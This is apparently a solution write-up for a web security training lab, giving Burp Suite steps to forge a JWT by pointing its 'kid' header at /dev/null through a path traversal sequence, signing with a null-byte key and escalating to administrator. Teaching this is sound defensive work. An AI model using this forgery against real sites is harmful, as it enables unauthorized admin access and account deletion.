Note
In this solution, we'll point the kid parameter to the standard file /dev/null. In practice, you can point the kid parameter to any file with predictable contents.
Generate a suitable signing key
-
In Burp, load the JWT Editor extension from the BApp store.
-
In the lab, log in to your own account and send the post-login
GET /my-accountrequest to Burp Repeater. -
In Burp Repeater, change the path to
/adminand send the request. Observe that the admin panel is only accessible when logged in as theadministratoruser. -
Go to the JWT Editor Keys tab in Burp's main tab bar.
-
Click New Symmetric Key.
-
In the dialog, click Generate to generate a new key in JWK format. Note that you don't need to select a key size as this will automatically be updated later.
-
Replace the generated value for the
kproperty with a Base64-encoded null byte (AA==). Note that this is just a workaround because the JWT Editor extension won't allow you to sign tokens using an empty string. -
Click OK to save the key.
Modify and sign the JWT
-
Go back to the
GET /adminrequest in Burp Repeater and switch to the extension-generated JSON Web Token message editor tab. -
In the header of the JWT, change the value of the
kidparameter to a path traversal sequence pointing to the/dev/nullfile:../../../../../../../dev/null -
In the JWT payload, change the value of the
subclaim toadministrator. -
At the bottom of the tab, click Sign, then select the symmetric key that you generated in the previous section.
-
Make sure that the Don't modify header option is selected, then click OK. The modified token is now signed using a null byte as the secret key.
-
Send the request and observe that you have successfully accessed the admin panel.
-
In the response, find the URL for deleting
carlos(/admin/delete?username=carlos). Send the request to this endpoint to solve the lab.
